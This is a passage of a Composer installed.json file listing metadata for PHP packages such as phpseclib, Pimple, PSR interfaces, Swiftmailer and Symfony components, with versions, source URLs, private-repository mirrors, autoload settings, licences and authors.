            "ext-gmp": "Install the GMP (GNU Multiple Precision) extension in order to speed up arbitrary precision integer arithmetic operations.",
            "ext-libsodium": "SSH2/SFTP can make use of some algorithms provided by the libsodium-php extension.",
            "ext-mcrypt": "Install the Mcrypt extension in order to speed up a few other cryptographic operations.",
            "ext-openssl": "Install the OpenSSL extension in order to speed up a wide variety of cryptographic operations."
        },
        "time": "2018-04-15T16:55:05+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "files": [
                "phpseclib/bootstrap.php"
            ],
            "psr-4": {
                "phpseclib\\": "phpseclib/"
            }
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Jim Wigginton",
                "email": "terrafrost@php.net",
                "role": "Lead Developer"
            },
            {
                "name": "Patrick Monnerat",
                "email": "pm@datasphere.ch",
                "role": "Developer"
            },
            {
                "name": "Andreas Fischer",
                "email": "bantu@phpbb.com",
                "role": "Developer"
            },
            {
                "name": "Hans-Jürgen Petrich",
                "email": "petrich@tronic-media.com",
                "role": "Developer"
            },
            {
                "name": "Graham Campbell",
                "email": "graham@alt-three.com",
                "role": "Developer"
            }
        ],
        "description": "PHP Secure Communications Library - Pure-PHP implementations of RSA, AES, SSH2, SFTP, X.509 etc.",
        "homepage": "http://phpseclib.sourceforge.net",
        "keywords": [
            "BigInteger",
            "aes",
            "asn.1",
            "asn1",
            "blowfish",
            "crypto",
            "cryptography",
            "encryption",
            "rsa",
            "security",
            "sftp",
            "signature",
            "signing",
            "ssh",
            "twofish",
            "x.509",
            "x509"
        ]
    },
    {
        "name": "pimple/pimple",
        "version": "v3.2.3",
        "version_normalized": "3.2.3.0",
        "source": {
            "type": "git",
            "url": "https://github.com/silexphp/Pimple.git",
            "reference": "9e403941ef9d65d20cba7d54e29fe906db42cf32"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/silexphp/Pimple/zipball/9e403941ef9d65d20cba7d54e29fe906db42cf32",
            "reference": "9e403941ef9d65d20cba7d54e29fe906db42cf32",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "php": ">=5.3.0",
            "psr/container": "^1.0"
        },
        "require-dev": {
            "symfony/phpunit-bridge": "^3.2"
        },
        "time": "2018-01-21T07:42:36+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "3.2.x-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-0": {
                "Pimple": "src/"
            }
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Fabien Potencier",
                "email": "fabien@symfony.com"
            }
        ],
        "description": "Pimple, a simple Dependency Injection Container",
        "homepage": "http://pimple.sensiolabs.org",
        "keywords": [
            "container",
            "dependency injection"
        ]
    },
    {
        "name": "psr/container",
        "version": "1.0.0",
        "version_normalized": "1.0.0.0",
        "source": {
            "type": "git",
            "url": "https://github.com/php-fig/container.git",
            "reference": "b7ce3b176482dbbc1245ebf52b181af44c2cf55f"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/php-fig/container/zipball/b7ce3b176482dbbc1245ebf52b181af44c2cf55f",
            "reference": "b7ce3b176482dbbc1245ebf52b181af44c2cf55f",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "php": ">=5.3.0"
        },
        "time": "2017-02-14T16:28:37+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "1.0.x-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "Psr\\Container\\": "src/"
            }
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "PHP-FIG",
                "homepage": "http://www.php-fig.org/"
            }
        ],
        "description": "Common Container Interface (PHP FIG PSR-11)",
        "homepage": "https://github.com/php-fig/container",
        "keywords": [
            "PSR-11",
            "container",
            "container-interface",
            "container-interop",
            "psr"
        ]
    },
    {
        "name": "psr/http-message",
        "version": "1.0.1",
        "version_normalized": "1.0.1.0",
        "source": {
            "type": "git",
            "url": "https://github.com/php-fig/http-message.git",
            "reference": "f6561bf28d520154e4b0ec72be95418abe6d9363"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/php-fig/http-message/zipball/f6561bf28d520154e4b0ec72be95418abe6d9363",
            "reference": "f6561bf28d520154e4b0ec72be95418abe6d9363",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "php": ">=5.3.0"
        },
        "time": "2016-08-06T14:39:51+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "1.0.x-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "Psr\\Http\\Message\\": "src/"
            }
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "PHP-FIG",
                "homepage": "http://www.php-fig.org/"
            }
        ],
        "description": "Common interface for HTTP messages",
        "homepage": "https://github.com/php-fig/http-message",
        "keywords": [
            "http",
            "http-message",
            "psr",
            "psr-7",
            "request",
            "response"
        ]
    },
    {
        "name": "psr/log",
        "version": "1.1.3",
        "version_normalized": "1.1.3.0",
        "source": {
            "type": "git",
            "url": "https://github.com/php-fig/log.git",
            "reference": "0f73288fd15629204f9d42b7055f72dacbe811fc"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/php-fig/log/zipball/0f73288fd15629204f9d42b7055f72dacbe811fc",
            "reference": "0f73288fd15629204f9d42b7055f72dacbe811fc",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "php": ">=5.3.0"
        },
        "time": "2020-03-23T09:12:05+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "1.1.x-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "Psr\\Log\\": "Psr/Log/"
            }
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "PHP-FIG",
                "homepage": "http://www.php-fig.org/"
            }
        ],
        "description": "Common interface for logging libraries",
        "homepage": "https://github.com/php-fig/log",
        "keywords": [
            "log",
            "psr",
            "psr-3"
        ]
    },
    {
        "name": "rackspace/php-opencloud",
        "version": "v1.16.0",
        "version_normalized": "1.16.0.0",
        "source": {
            "type": "git",
            "url": "https://github.com/rackspace/php-opencloud.git",
            "reference": "d6b71feed7f9e7a4b52e0240a79f06473ba69c8c"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/rackspace/php-opencloud/zipball/d6b71feed7f9e7a4b52e0240a79f06473ba69c8c",
            "reference": "d6b71feed7f9e7a4b52e0240a79f06473ba69c8c",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "guzzle/guzzle": "~3.8",
            "mikemccabe/json-patch-php": "~0.1",
            "php": ">=5.4",
            "psr/log": "~1.0"
        },
        "require-dev": {
            "apigen/apigen": "~4.0",
            "fabpot/php-cs-fixer": "1.0.*@dev",
            "jakub-onderka/php-parallel-lint": "0.*",
            "phpspec/prophecy": "~1.4",
            "phpunit/phpunit": "4.3.*",
            "satooshi/php-coveralls": "0.6.*@dev"
        },
        "time": "2016-01-29T10:34:57+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "psr-0": {
                "OpenCloud": [
                    "lib/"
                ]
            }
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "Apache-2.0"
        ],
        "authors": [
            {
                "name": "Jamie Hannaford",
                "email": "jamie.hannaford@rackspace.com",
                "homepage": "https://github.com/jamiehannaford"
            }
        ],
        "description": "PHP SDK for Rackspace/OpenStack APIs",
        "keywords": [
            "Openstack",
            "nova",
            "opencloud",
            "rackspace",
            "swift"
        ]
    },
    {
        "name": "ralouphie/getallheaders",
        "version": "3.0.3",
        "version_normalized": "3.0.3.0",
        "source": {
            "type": "git",
            "url": "https://github.com/ralouphie/getallheaders.git",
            "reference": "120b605dfeb996808c31b6477290a714d356e822"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/ralouphie/getallheaders/zipball/120b605dfeb996808c31b6477290a714d356e822",
            "reference": "120b605dfeb996808c31b6477290a714d356e822",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "php": ">=5.6"
        },
        "require-dev": {
            "php-coveralls/php-coveralls": "^2.1",
            "phpunit/phpunit": "^5 || ^6.5"
        },
        "time": "2019-03-08T08:55:37+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "files": [
                "src/getallheaders.php"
            ]
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Ralph Khattar",
                "email": "ralph.khattar@gmail.com"
            }
        ],
        "description": "A polyfill for getallheaders."
    },
    {
        "name": "swiftmailer/swiftmailer",
        "version": "v5.4.12",
        "version_normalized": "5.4.12.0",
        "source": {
            "type": "git",
            "url": "https://github.com/swiftmailer/swiftmailer.git",
            "reference": "181b89f18a90f8925ef805f950d47a7190e9b950"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/swiftmailer/swiftmailer/zipball/181b89f18a90f8925ef805f950d47a7190e9b950",
            "reference": "181b89f18a90f8925ef805f950d47a7190e9b950",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "php": ">=5.3.3"
        },
        "require-dev": {
            "mockery/mockery": "~0.9.1",
            "symfony/phpunit-bridge": "~3.2"
        },
        "time": "2018-07-31T09:26:32+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "5.4-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "files": [
                "lib/swift_required.php"
            ]
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Chris Corbyn"
            },
            {
                "name": "Fabien Potencier",
                "email": "fabien@symfony.com"
            }
        ],
        "description": "Swiftmailer, free feature-rich PHP mailer",
        "homepage": "https://swiftmailer.symfony.com",
        "keywords": [
            "email",
            "mail",
            "mailer"
        ]
    },
    {
        "name": "symfony/event-dispatcher",
        "version": "v3.4.33",
        "version_normalized": "3.4.33.0",
        "source": {
            "type": "git",
            "url": "https://github.com/symfony/event-dispatcher.git",
            "reference": "f9031c22ec127d4a2450760f81a8677fe8a10177"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/symfony/event-dispatcher/zipball/f9031c22ec127d4a2450760f81a8677fe8a10177",
            "reference": "f9031c22ec127d4a2450760f81a8677fe8a10177",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "php": "^5.5.9|>=7.0.8"
        },
        "conflict": {
            "symfony/dependency-injection": "<3.3"
        },
        "require-dev": {
            "psr/log": "~1.0",
            "symfony/config": "~2.8|~3.0|~4.0",
            "symfony/dependency-injection": "~3.3|~4.0",
            "symfony/expression-language": "~2.8|~3.0|~4.0",
            "symfony/stopwatch": "~2.8|~3.0|~4.0"
        },
        "suggest": {
            "symfony/dependency-injection": "",
            "symfony/http-kernel": ""
        },
        "time": "2019-10-24T15:33:53+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "3.4-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "Symfony\\Component\\EventDispatcher\\": ""
            },
            "exclude-from-classmap": [
                "/Tests/"
            ]
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Fabien Potencier",
                "email": "fabien@symfony.com"
            },
            {
                "name": "Symfony Community",
                "homepage": "https://symfony.com/contributors"
            }
        ],
        "description": "Symfony EventDispatcher Component",
        "homepage": "https://symfony.com"
    },
    {
        "name": "symfony/polyfill-mbstring",
        "version": "v1.12.0",
        "version_normalized": "1.12.0.0",
        "source": {
            "type": "git",
            "url": "https://github.com/symfony/polyfill-mbstring.git",
            "reference": "b42a2f66e8f1b15ccf25652c3424265923eb4f17"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/symfony/polyfill-mbstring/zipball/b42a2f66e8f1b15ccf25652c3424265923eb4f17",
            "reference": "b42a2f66e8f1b15ccf25652c3424265923eb4f17",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "php": ">=5.3.3"
        },
        "suggest": {
            "ext-mbstring": "For best performance"
        },
        "time": "2019-08-06T08:03:45+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "1.12-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "Symfony\\Polyfill\\Mbstring\\": ""
            },
            "files": [
                "bootstrap.php"
            ]
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Nicolas Grekas",
                "email": "p@tchwork.com"
            },
            {
                "name": "Symfony Community",
                "homepage": "https://symfony.com/contributors"
            }
        ],
        "description": "Symfony polyfill for the Mbstring extension",
        "homepage": "https://symfony.com",
        "keywords": [
            "compatibility",
            "mbstring",
            "polyfill",
            "portable",
            "shim"
        ]
    },
    {
        "name": "symfony/translation",
        "version": "v2.8.44",
        "version_normalized": "2.8.44.0",
        "source": {
            "type": "git",
            "url": "https://github.com/symfony/translation.git",
            "reference": "12ad0a708ec55fb80cac9e809c5b56ddd5417d6a"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/symfony/translation/zipball/12ad0a708ec55fb80cac9e809c5b56ddd5417d6a",
            "reference": "12ad0a708ec55fb80cac9e809c5b56ddd5417d6a",
            "shasum": "",
            "mirrors": [
                {
                    "url": "https://repo.packagist.com/inpsyde/dists/%package%/%version%/%reference%.%type%",
                    "preferred": true
                }
            ]
        },
        "require": {
            "php": ">=5.3.9",
            "symfony/polyfill-mbstring": "~1.0"
        },
        "conflict": {
            "symfony/config": "<2.7"
        },
        "require-dev": {
            "psr/log": "~1.0",
            "symfony/config": "~2.8",
            "symfony/intl": "~2.7.25|^2.8.18|~3.2.5",
            "symfony/yaml": "~2.2|~3.0.0"
        },
        "suggest": {
            "psr/log-implementation": "To use logging capability in translator",
            "symfony/config": "",
            "symfony/yaml": ""
        },
        "time": "2018-07-26T11:13:39+00:00",
        "type": "library",
        "extra": {
            "branch-alias": {
                "dev-master": "2.8-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "Symfony\\Component\\Translation\\": ""
            },
            "exclude-from-classmap": [
                "/Tests/"
            ]
        },
        "notification-url": "https://repo.packagist.com/inpsyde/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Fabien Potencier",
                "email": "fabien@symfony.com"
            },
            {
                "name": "Symfony Community",
                "homepage": "https://symfony.com/contributors"
            }
        ],
        "description": "Symfony Translation Component",
        "homepage": "https://symfony.com"
    }
]